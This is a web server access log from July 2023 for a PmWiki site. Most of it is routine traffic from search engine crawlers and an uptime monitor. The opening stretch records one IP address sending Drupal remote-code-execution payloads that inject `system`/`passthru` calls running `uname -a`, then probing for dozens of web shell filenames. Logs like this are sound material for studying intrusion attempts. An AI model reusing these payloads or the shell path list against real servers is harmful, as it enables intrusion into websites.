195.110.153.181 - - [17/Jul/2023:16:41:29 +0200] "GET /crontab.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:33 +0200] "GET /pmwiki/pmwiki.php/Main/crontab.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:39 +0200] "POST /pmwiki/pmwiki.php/Main/?q=user/password&name[%23post_render][]=system&name[%23type]=markup&name[%23markup]=echo%20InfoOS:%60uname%20-a%60OSInfo HTTP/1.1" 302 186 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:39 +0200] "POST /pmwiki/pmwiki.php/Main//?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=echo%20InfoOS:%60uname%20-a%60OSInfo HTTP/1.1" 302 186 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:39 +0200] "POST /pmwiki/pmwiki.php/Main/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:39 +0200] "POST /pmwiki/pmwiki.php/Main//?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=echo%20InfoOS:%60uname%20-a%60OSInfo HTTP/1.1" 302 186 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:39 +0200] "POST /?q=user/password&name[%23post_render][]=system&name[%23type]=markup&name[%23markup]=echo%20InfoOS:%60uname%20-a%60OSInfo HTTP/1.1" 302 5 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:39 +0200] "POST /pmwiki/pmwiki.php/Main/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:39 +0200] "POST //?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=echo%20InfoOS:%60uname%20-a%60OSInfo HTTP/1.1" 302 5 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:39 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/ze.php?z9 HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:40 +0200] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:43 +0200] "POST //?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=echo%20InfoOS:%60uname%20-a%60OSInfo HTTP/1.1" 302 5 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:43 +0200] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:44 +0200] "GET //sites/default/files/ze.php?z9 HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:45 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/insom.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:47 +0200] "GET //sites/default/files/insom.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:48 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/renata.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:50 +0200] "GET //sites/default/files/renata.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:53 +0200] "GET /sites/default/files/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:41:56 +0200] "GET /sites/default/files/js/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:01 +0200] "GET /sites/default/files/ctools/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:04 +0200] "GET /sites/default/files/ctools/index.php.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:04 +0200] "GET /pmwiki/pmwiki.php/Main/sites/default/files/js/memey.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:08 +0200] "GET /sites/default/files/languages/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:08 +0200] "GET /pmwiki/pmwiki.php/Main/sites/default/files/ctools/memey.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:11 +0200] "GET /sites/default/files/renata.phtml HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:12 +0200] "GET /pmwiki/pmwiki.php/Main/sites/default/files/ctools/index.php.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:14 +0200] "GET /sites/default/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:16 +0200] "GET /pmwiki/pmwiki.php/Main/sites/default/files/languages/memey.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:19 +0200] "GET /pmwiki/pmwiki.php/Main/sites/default/files/renata.phtml HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:30 +0200] "GET /pmwiki/pmwiki.php/Main/sites/default/memey.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:32 +0200] "GET /sites/all/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:33 +0200] "GET /pmwiki/pmwiki.php/Main/sites/all/memey.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:36 +0200] "GET /includes/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:39 +0200] "GET /modules/blog/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:42 +0200] "GET /misc/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:46 +0200] "GET /profiles/minimal/memey.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:50 +0200] "GET /pmwiki/pmwiki.php/Main/modules/blog/memey.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:50 +0200] "GET //sites/default/files/accesson.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:54 +0200] "GET /pmwiki/pmwiki.php/Main/misc/memey.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:55 +0200] "GET //sites/default/files/pilat.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:57 +0200] "GET /pmwiki/pmwiki.php/Main/profiles/minimal/memey.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:42:58 +0200] "GET //sites/default/files/cia.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:01 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/accesson.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:02 +0200] "GET //sites/default/files/demit.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:05 +0200] "GET //sites/default/files/modules.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:07 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/pilat.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:09 +0200] "GET //sites/default/files/vertigo.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:10 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/cia.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:13 +0200] "GET //sites/default/files/fuck.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:18 +0200] "GET //sites/default/files/Foto2018.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:21 +0200] "GET //sites/default/files/up.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:21 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/demit.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:24 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/modules.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:33 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/vertigo.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:36 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/fuck.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:37 +0200] "GET //sites/default/index.php.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:39 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/Foto2018.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:46 +0200] "GET //sites/default/files/index.php.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:47 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/up.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:49 +0200] "GET //sites/default/files/286118814.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:51 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/index.php.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:53 +0200] "GET //insom.php?1212 HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:54 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/index.php.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:56 +0200] "GET //index.php.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:57 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/286118814.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:43:59 +0200] "GET //demit.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:01 +0200] "GET /pmwiki/pmwiki.php/Main//insom.php?1212 HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:02 +0200] "GET //up.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:04 +0200] "GET /pmwiki/pmwiki.php/Main//index.php.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:08 +0200] "GET /pmwiki/pmwiki.php/Main//demit.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:12 +0200] "GET /pmwiki/pmwiki.php/Main//up.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:16 +0200] "GET //fuck.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:16 +0200] "GET /pmwiki/pmwiki.php/Main//fuck.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:19 +0200] "GET //modules.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:22 +0200] "GET //286118814.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:25 +0200] "GET //vertigo.php?1212 HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:25 +0200] "GET /pmwiki/pmwiki.php/Main//modules.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:28 +0200] "GET //sites/default/files/ze.php?z9 HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:29 +0200] "GET /pmwiki/pmwiki.php/Main//286118814.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:32 +0200] "GET //Foto2018.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:32 +0200] "GET /pmwiki/pmwiki.php/Main//vertigo.php?1212 HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:35 +0200] "GET /pmwiki/pmwiki.php/Main//sites/default/files/ze.php?z9 HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:48 +0200] "GET //Drupal2019.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:49 +0200] "GET /pmwiki/pmwiki.php/Main//Foto2018.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:51 +0200] "GET //logo2019.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:53 +0200] "GET /pmwiki/pmwiki.php/Main//Foto02018.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:54 +0200] "GET //drupal.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:56 +0200] "GET /pmwiki/pmwiki.php/Main//Drupal2019.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:58 +0200] "GET //zeXXX.php?z9 HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:44:59 +0200] "GET /pmwiki/pmwiki.php/Main//logo2019.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:02 +0200] "GET //ramz.php?yena HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:05 +0200] "GET //cia.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:05 +0200] "GET /pmwiki/pmwiki.php/Main//drupal.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:08 +0200] "GET //pilat.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:08 +0200] "GET /pmwiki/pmwiki.php/Main//zeXXX.php?z9 HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:11 +0200] "GET /pmwiki/pmwiki.php/Main//ramz.php?yena HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:12 +0200] "GET //ramz.php?y3n4 HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:15 +0200] "GET /pmwiki/pmwiki.php/Main//cia.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:15 +0200] "GET //accesson.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:18 +0200] "GET /pmwiki/pmwiki.php/Main//pilat.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:18 +0200] "GET //renata.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:21 +0200] "GET /pmwiki/pmwiki.php/Main//ramz.php?y3n4 HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:21 +0200] "GET /authorize_old.php HTTP/1.1" 404 1181 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:24 +0200] "GET /pmwiki/pmwiki.php/Main//accesson.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:28 +0200] "GET /pmwiki/pmwiki.php/Main//renata.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
195.110.153.181 - - [17/Jul/2023:16:45:31 +0200] "GET /pmwiki/pmwiki.php/Main/authorize_old.php HTTP/1.1" 404 294 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)"
54.36.148.130 - - [17/Jul/2023:16:49:11 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekDRM HTTP/1.1" 200 18047 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.244.66.203 - - [17/Jul/2023:16:49:52 +0200] "GET /pmwiki/pmwiki.php/Main/Ipr?action=diff&source=n&minor=y HTTP/1.1" 200 15128 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
110.93.150.49 - - [17/Jul/2023:16:59:50 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Yeti/1.1; +https://naver.me/spd)"
110.93.150.144 - - [17/Jul/2023:16:59:52 +0200] "GET / HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Yeti/1.1; +https://naver.me/spd)"
110.93.150.144 - - [17/Jul/2023:16:59:54 +0200] "GET /pmwiki/pmwiki.php HTTP/1.1" 200 37269 "-" "Mozilla/5.0 (compatible; Yeti/1.1; +https://naver.me/spd)"
212.237.51.151 - - [17/Jul/2023:17:01:55 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
185.191.171.12 - - [17/Jul/2023:17:14:44 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.25 - - [17/Jul/2023:17:14:44 +0200] "GET /pmwiki/pmwiki.php/Main/Nyilatkozat HTTP/1.1" 200 18473 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
5.255.231.70 - - [17/Jul/2023:17:14:47 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.255.231.93 - - [17/Jul/2023:17:14:48 +0200] "GET /pmwiki/pmwiki.php/Main/LehetsegesJavitasokEuropaban?action=diff HTTP/1.1" 200 31061 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
54.36.148.168 - - [17/Jul/2023:17:15:03 +0200] "GET /pmwiki/pmwiki.php/Main/LehetsegesJavitasokEuropaban HTTP/1.1" 200 14070 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.244.66.203 - - [17/Jul/2023:17:22:32 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
110.249.202.116 - - [17/Jul/2023:17:35:26 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
216.244.66.203 - - [17/Jul/2023:17:41:15 +0200] "GET /pmwiki/pmwiki.php/API/PZZ?action=diff&source=y&minor=n HTTP/1.1" 200 12688 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
216.244.66.203 - - [17/Jul/2023:17:41:21 +0200] "GET /pmwiki/pmwiki.php/Main/Cikkek?action=diff&source=y&minor=n HTTP/1.1" 200 85161 "-" "Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)"
212.237.51.151 - - [17/Jul/2023:17:49:18 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
49.12.13.109 - - [17/Jul/2023:18:19:13 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
213.180.203.78 - - [17/Jul/2023:18:26:26 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.255.231.195 - - [17/Jul/2023:18:26:28 +0200] "GET /pmwiki/pmwiki.php/Main/BMEKonferencia?action=diff HTTP/1.1" 200 76698 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.213.210 - - [17/Jul/2023:18:38:37 +0200] "GET /pmwiki/pmwiki.php/Main/CikkekDRM?action=upload HTTP/1.1" 200 12298 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
185.191.171.3 - - [17/Jul/2023:19:09:06 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.16 - - [17/Jul/2023:19:09:07 +0200] "GET /pmwiki/pmwiki.php/Main/HomePage HTTP/1.1" 200 37269 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.237.23.143 - - [17/Jul/2023:19:13:31 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
54.36.148.132 - - [17/Jul/2023:19:35:41 +0200] "GET /pmwiki/pmwiki.php/Main/AzIPRJavaslat HTTP/1.1" 200 14797 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.237.51.151 - - [17/Jul/2023:20:01:55 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
64.124.8.40 - - [17/Jul/2023:20:34:44 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36"
64.124.8.40 - - [17/Jul/2023:20:34:45 +0200] "GET /pmwiki/pmwiki.php/Main/DRMMunkacsoport HTTP/1.1" 200 12700 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36"
212.237.53.115 - - [17/Jul/2023:20:51:37 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
5.255.231.250 - - [17/Jul/2023:20:58:23 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
95.108.213.228 - - [17/Jul/2023:20:58:24 +0200] "GET /pmwiki/pmwiki.php/Main/Minimum?action=edit HTTP/1.1" 200 12382 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
64.124.8.40 - - [17/Jul/2023:21:08:50 +0200] "GET /pmwiki/pmwiki.php/PmWiki/OtherVariables HTTP/1.1" 200 17184 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36"
64.124.8.40 - - [17/Jul/2023:21:14:36 +0200] "GET /pmwiki/pmwiki.php/Main/Ipr HTTP/1.1" 200 13258 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36"
212.237.23.143 - - [17/Jul/2023:21:50:37 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
212.237.51.151 - - [17/Jul/2023:22:46:10 +0200] "HEAD /pmwiki/pmwiki.php HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
